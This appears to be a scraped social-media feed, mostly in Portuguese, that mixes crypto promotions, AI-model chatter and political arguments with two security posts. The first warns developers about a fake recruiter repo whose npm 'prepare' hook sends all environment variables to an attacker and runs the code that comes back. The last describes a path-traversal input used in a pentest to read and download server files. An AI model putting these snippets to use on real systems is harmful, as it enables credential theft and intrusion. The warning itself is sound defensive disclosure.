sinners.base.eth

@vedovelli74 Isso é comum, ja recebi varios "testes" assim, só aceito fazer em ambiente isolado de challenge

⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.

@0xCokinha @OKXBrasil dm

@___sinners___ @OKXBrasil Me passa tua UID na DM da conta OKX que eu verifico pra ti.

VOCÊS ACHAM QUE O PIZZA DAY ACABOU? Acabou nada! A @OKXBrasil tá fazendo a boa pagando até $15 dólares da sua pizza! Entra no link e aproveita: okx.com/campaigns/bitc…

@Pitch_ERC Was me

Someone just spent 1x $PITCH and packed BRAZIL Then used that BRAZIL and pulled VINICIUS 50 vinicius cards from packs, ever. some people just live different

new bun pr merge accepted of 1M lines its crazy bro 😂

@5gramasdememes 042

QUAL❓❓

@brmoniz E transferências acima do limite de $100k, entram onde ?

tá rolando que o BC "proibiu cripto em remessa". não foi isso. a Resolução BCB 561/2026 fez uma coisa diferente: separou os trilhos. eFX não usa cripto. cripto vai pelo trilho da PSAV cambial (Res. 521). deixa eu explicar....

@_iamleofc Dm

Cadê os Devs/Engenheiros sênior que querem trabalhar na gringa ($) comigo e manjam de Node.js, que estão bem familiarizados com o uso de AI-assisted development tools (Codex, Claude) e, claro, que sejam bem responsáveis / saibam interpretar o código que está sendo gerado.

Mythos leak?

NEW: A small group of "unauthorized users" have reportedly breached Anthropic's tightly restricted Claude Mythos.

Dude GPT-Image-2... wtf... how.

INTRODUCING: ARKHAM DECENTRALIZED TRADING We’ve launched decentralized trading on Arkham - so you can find and trade the best tokens on Solana with lightning speed. Track the most promising recently launched tokens and traders in real-time, then trade with that data on Arkham.

@Data4Cyb @wowooos_ Acho que não então, tem cara de outra coisa

@Data4Cyb @wowooos_ Spoofing por conta de dmarc?

@pokerdev7 deixa, viajei, o bug era com rate limit

@___sinners___ mano n entendi nada disso

O Opus 4.7 veio com uma perfomance muito pior em contextos "longos" do que o Opus 4.6 Qual sentido de lançar um modelo novo se ele vem piorado? GPT 5.5 vai amassar esse betinha

@Pentadao1 @Samssauro @paginalixo1 Digo bem antes disso , não os tempos feudais , mas sim

@___sinners___ @Samssauro @paginalixo1 Nossos ancestrais sempre foram capitalistas, ainda que ninguém soubesse o que é isso. Prova disso é que na história da humanidade existem os ricos senhores e os servos pobres. Existem aqueles adornados em ouro, principalmente governantes e aqueles que mal tinham o que comer.

Qual vc escolheria?

@Samssauro @Pentadao1 @paginalixo1 Simples, independente de capitalismo ou seja lá qual regime , use sua energia enquanto ela existe, acumule o máximo de recursos e depois descanse quando for a hora e ela já não for abundante mais, nossos ancestrais não eram capitalistas e tentavam fazer o mesmo

@___sinners___ @Pentadao1 @paginalixo1 Divertido ver o jovem pobre burro alienado pelo capitalismo dar a opinião dele. Se pelo menos fosse velho...

@0xPira @ninjaaexe mais do que isso a maior parte das companhias é focada no entrega, depois corrige

@ninjaaexe SIM HAHAHAHA eu canso de pegar falha assim. a maioria dos devs não sabe o BASICO de sec

acabei de achar uma vuln bem legal num pentest! parecia até ambiente de ctf kkkkkkkk se liga só: o app deixa vc fazer upload de documentos e salva o arquivo temporário no server com um UID por exemplo "6991cfd77e8a185664d0c26cf58180ae" só que o nome temporário vem do client. então tentei colocar um UID que não existia. e deu erro!! "Erro ao inserir documento giphy (1): Could not find file 'C:\\Windows\\TEMP\\NAO_EXISTO'." aí já não tem mais segredo! path traversal setei o UID como ".. \\..\\ Windows \\win. ini" e aceitou!!! o backend faz um File . Read no path que eu mesmo controlo, salva o conteúdo daquele arquivo como "meu documento" e eu consigo baixar normalmente e exfiltrar dados do server! falha bem tranquila de explorar mas bem gostosinha